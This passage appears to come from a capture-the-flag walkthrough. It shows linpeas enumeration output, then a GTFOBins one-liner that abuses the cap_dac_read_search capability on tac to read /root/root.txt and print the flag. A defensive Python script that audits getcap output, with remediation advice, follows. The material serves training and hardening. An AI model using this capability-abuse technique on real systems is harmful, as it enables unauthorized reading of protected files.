-rw-r--r-- 1 root root 33 Aug 9 2020 user.txt
╔══════════╣ Files inside others home (limit 20)
/var/www/html/robots.txt
/var/www/html/wedadmin/index.php
/var/www/html/index.html.save
/var/www/html/index.html
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 363752 Apr 30 2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 9716 Jun 7 2020 /usr/lib/modules/4.19.0-9-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9716 Jul 24 2020 /usr/lib/modules/4.19.0-10-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Aug 9 2020 .
drwxr-xr-x 12 root root 4.0K Aug 9 2020 ..
drwxr-xr-x 3 root root 4.0K Aug 9 2020 html
/var/www/html:
total 20K
drwxr-xr-x 3 root root 4.0K Aug 9 2020 .
drwxr-xr-x 3 root root 4.0K Aug 9 2020 ..
╔══════════╣ All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw------- 1 root root 0 Aug 9 2020 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 18 2019 /etc/skel/.bash_logout
-rw-r--r-- 1 bob bob 220 Aug 9 2020 /home/bob/.bash_logout
-rw-r--r-- 1 root root 0 Nov 15 2018 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 root root 0 Nov 7 05:32 /run/network/.ifstate.lock
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxr-xr-x 1 bob bob 827827 Nov 6 22:04 /tmp/linpeas.sh
-rw-r--r-- 1 root root 8987 Aug 9 2020 /var/backups/apt.extended_states.0
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/bob
/run/lock
/tmp
/tmp/linpeas.sh
/var/lib/php/sessions
/var/tmp
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
2020-08-09 21:58:45 configure base-passwd:amd64 3.5.46 3.5.46
2020-08-09 21:58:45 install base-passwd:amd64 <none> 3.5.46
2020-08-09 21:58:45 status half-configured base-passwd:amd64 3.5.46
2020-08-09 21:58:45 status half-installed base-passwd:amd64 3.5.46
2020-08-09 21:58:45 status installed base-passwd:amd64 3.5.46
2020-08-09 21:58:45 status unpacked base-passwd:amd64 3.5.46
2020-08-09 21:58:51 status half-configured base-passwd:amd64 3.5.46
2020-08-09 21:58:51 status half-installed base-passwd:amd64 3.5.46
2020-08-09 21:58:51 status unpacked base-passwd:amd64 3.5.46
2020-08-09 21:58:51 upgrade base-passwd:amd64 3.5.46 3.5.46
2020-08-09 21:58:54 install passwd:amd64 <none> 1:4.5-1.1
2020-08-09 21:58:54 status half-installed passwd:amd64 1:4.5-1.1
2020-08-09 21:58:54 status unpacked passwd:amd64 1:4.5-1.1
2020-08-09 21:58:56 configure base-passwd:amd64 3.5.46 <none>
2020-08-09 21:58:56 status half-configured base-passwd:amd64 3.5.46
2020-08-09 21:58:56 status installed base-passwd:amd64 3.5.46
2020-08-09 21:58:56 status unpacked base-passwd:amd64 3.5.46
2020-08-09 21:58:57 configure passwd:amd64 1:4.5-1.1 <none>
2020-08-09 21:58:57 status half-configured passwd:amd64 1:4.5-1.1
2020-08-09 21:58:57 status installed passwd:amd64 1:4.5-1.1
2020-08-09 21:58:57 status unpacked passwd:amd64 1:4.5-1.1
Description: Set up users and passwords
dmidecode: Administrator Password Status: Enabled
dmidecode: Keyboard Password Status: Unknown
dmidecode: Power-On Password Status: Disabled
                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
Among the findings:
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tac = cap_dac_read_search+ep
Looking up tac on the GTFOBins site gives:
File read
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file_to_read
tac -s 'RANDOM' "$LFILE"
bob@backdoored:/tmp# tac -s 'RANDOM' "/root/root.txt"
395fdad197a5386ea3f8d02143f3fb75
The root flag is read successfully.
Source: https://www.cnblogs.com/jason-huawen/p/16865398.html
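The capability finding is what turns a non-root shell into a root-flag read: cap_dac_read_search lets /usr/bin/tac bypass read and search permission checks on any file, and the -s 'RANDOM' separator, which does not occur in the file, makes tac emit the whole file as a single record so it comes out unreversed. The following Python script is an added example, not part of the original writeup or of linpeas: it parses getcap -r / output in both the older "path = caps+flags" and the newer libcap "path caps=flags" style, compares each binary against a list of distribution defaults, and rates the rest by how dangerous the granted capabilities are. The sample getcap output is constructed; the ping and tac lines mirror the page's findings, the other two paths are made up.

```python
import re

# Constructed getcap output. The first two lines mirror the two capability
# findings linpeas reported on this box; the last two are made-up paths that
# show the newer libcap output style ("path caps=flags", no " = ").
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tac = cap_dac_read_search+ep
/usr/sbin/example-daemon cap_net_bind_service=ep
/usr/local/bin/example-helper cap_setuid,cap_sys_admin=eip
"""

# Capabilities that on their own let a local user cross a privilege boundary.
HIGH_RISK = {
    "cap_dac_read_search": "bypasses read and search permission checks: any file on the host becomes readable",
    "cap_dac_override": "bypasses read/write/execute permission checks",
    "cap_fowner": "bypasses ownership checks on chmod/chown-style operations",
    "cap_chown": "allows arbitrary changes of file ownership",
    "cap_setuid": "allows switching to any UID, including 0",
    "cap_setgid": "allows switching to any GID",
    "cap_sys_admin": "catch-all administrative capability (mounts, namespaces, ...)",
    "cap_sys_ptrace": "allows tracing and injecting into other processes",
    "cap_sys_module": "allows loading kernel modules",
}

# (path, capability set) pairs that are normal distribution defaults and should
# not raise an alert by themselves (ping with cap_net_raw is the Debian default).
EXPECTED = {
    ("/usr/bin/ping", frozenset({"cap_net_raw"})),
}

# Old libcap: "/usr/bin/ping = cap_net_raw+ep"; new libcap: "/usr/bin/ping cap_net_raw=ep"
LINE_RE = re.compile(r"^(?P<path>\S+)(?: = | )(?P<caps>\S+)$")


def parse_getcap_line(line):
    """Parse one getcap line in either output style; returns (path, sorted caps) or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    # "cap_a,cap_b+eip" (old) or "cap_a,cap_b=eip" (new): the capability names
    # are everything before the first '+' or '='; the flag letters are dropped.
    names = re.split(r"[+=]", m.group("caps"), maxsplit=1)[0]
    caps = sorted(c for c in names.split(",") if c)
    return m.group("path"), caps


def audit_capabilities(getcap_output):
    """Classify every binary in getcap output as high, review or expected."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        if (path, frozenset(caps)) in EXPECTED:
            severity, reasons = "expected", ["distribution default"]
        else:
            reasons = [f"{c}: {HIGH_RISK[c]}" for c in caps if c in HIGH_RISK]
            severity = "high" if reasons else "review"
        findings.append({"path": path, "caps": caps, "severity": severity, "reasons": reasons})
    order = {"high": 0, "review": 1, "expected": 2}
    findings.sort(key=lambda f: (order[f["severity"]], f["path"]))
    return findings


if __name__ == "__main__":
    for f in audit_capabilities(SAMPLE_GETCAP):
        print(f"[{f['severity']:>8}] {f['path']}: {','.join(f['caps'])}")
        for reason in f["reasons"]:
            print(f"           - {reason}")
```

On the box the remediation is to strip the capability (setcap -r /usr/bin/tac) and feed getcap -r / 2>/dev/null through the audit again, which should then leave only the expected ping entry. Because the script only consumes getcap text, the same audit can be run over output collected from a fleet of hosts, and the EXPECTED set is where a site records the capability grants it has deliberately approved.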